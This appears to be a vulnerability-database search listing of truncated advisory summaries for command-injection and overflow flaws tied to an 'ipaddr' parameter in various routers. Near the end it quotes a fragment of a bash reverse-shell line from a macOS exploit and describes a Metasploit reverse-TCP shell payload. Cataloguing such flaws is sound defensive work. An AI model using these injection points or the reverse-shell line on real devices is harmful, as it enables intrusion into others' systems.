139 matches found
CVE-2020-17456
SEOWON INTECH SLC-130 And SLR-120S devices allow Remote Code Execution via the ipAddr parameter to the systemlog.cgi page...
Remote code execution
SEOWON INTECH SLC-130 And SLR-120S devices allow Remote Code Execution via the ipAddr parameter to the systemlog.cgi page...
CVE-2020-17456
CVE-2020-17456 affects SEOWON INTECH SLC-130 and SLR-120S routers. Unauthenticated remote code execution is possible via the ipAddr parameter to the system_log.cgi page, allowing arbitrary command execution (reported as root privileges in multiple exploit artifacts). Public exploit material exist...
CVE-2020-17456
SEOWON INTECH SLC-130 And SLR-120S devices allow Remote Code Execution via the ipAddr parameter to the systemlog.cgi page...
CVE-2020-13122
The novish command-line interface, included in NoviFlow NoviWare before NW500.2.12 and deployed on NoviSwitch devices, is vulnerable to command injection in the "show status destination ipaddr" command. This could be used by a read-only user monitoring group or admin to execute commands on the...
Malicious Package
Overview activemodel-ipaddr-validator is a malicious package. Affected versions of this package were found to be a Malicious Package, as it utilised typosquatting to run Malicious 3rd party scripts. It replaced genuine packages using an and replaced it with - and vice versa Remediation Avoid usin...
VulnCheck KEV: CVE-2016-10760
On Seowon Intech routers, there is a Command Injection vulnerability in diagnostic.cgi via shell metacharacters in the pingipaddr parameter...
CVE-2018-20606
imcat 4.4 allows full path disclosure via a dev.php?tools-ipaddr&api=Pcoln&uip= URI...
CVE-2018-20606
imcat 4.4 allows full path disclosure via a dev.php?tools-ipaddr&api=Pcoln&uip= URI...
Command injection
System command injection in formAliasIp in TOTOLINK A3002RU version 1.0.8 allows attackers to execute system commands via the "ipAddr" POST parameter...
Command execution vulnerability in Fusion K2 router at lanset settings page
The Fusion K2 PSG1218 router is a must-have new generation wireless router for entry-level users. The Fusion K2 router suffers from a command execution vulnerability at the lanset settings page. The vulnerability is due to the backend code failing to properly filter user input ipaddr, which can b...
CVE-2018-5371
diagping.cmd on D-Link DSL-2640U devices with firmware IM1.00 and ME1.00, and DSL-2540U devices with firmware ME1.00, allows authenticated remote attackers to execute arbitrary OS commands via shell metacharacters in the ipaddr field of an HTTP GET request...
PT-2018-4009 · D Link · D-Link Dsl-2640B +1
Name of the Vulnerable Software and Affected Versions: D-Link DSL-2640U versions IM 1.00 and ME 1.00 D-Link DSL-2540U version ME 1.00 Description: The issue allows authenticated remote attackers to execute arbitrary OS commands via shell metacharacters in the ipaddr field of an HTTP GET request...
CVE-2014-9118
The web administrative portal in Zhone zNID GPON 2426A before S3.0.501 allows remote attackers to execute arbitrary commands via shell metacharacters in the ipAddr parameter to zhnping.cmd. Recent assessments: Assessed Attacker Value: 0 Assessed Attacker Value: 0Assessed Attacker Value: 0...
CVE-2015-5993
Buffer overflow in form2ping.cgi on Philippine Long Distance Telephone PLDT SpeedSurf 504AN devices with firmware GAN9.8U26-4-TX-R6B018-PH.EN and Kasda KW58293 devices allows remote attackers to cause a denial of service device outage via a long ipaddr parameter...
Buffer overflow
Buffer overflow in form2ping.cgi on Philippine Long Distance Telephone PLDT SpeedSurf 504AN devices with firmware GAN9.8U26-4-TX-R6B018-PH.EN and Kasda KW58293 devices allows remote attackers to cause a denial of service device outage via a long ipaddr parameter...
CVE-2015-5993
Buffer overflow in form2ping.cgi on Philippine Long Distance Telephone PLDT SpeedSurf 504AN devices with firmware GAN9.8U26-4-TX-R6B018-PH.EN and Kasda KW58293 devices allows remote attackers to cause a denial of service device outage via a long ipaddr parameter...
Mac OS X 10.8.4 Local Privilege Escalation
!/usr/bin/python Original MSF Module: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/osx/local/sudopasswordbypass.rb Exploit Title: OSX & /dev/tcp/%s/%s 0&1 &\n" % ipaddr,port...
Linux Command Shell, Reverse TCP Inline
Connect back to attacker and spawn a command shell This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 68 include Msf::Payload::Single include Msf::Payload::Linux::X86::Prepends includ...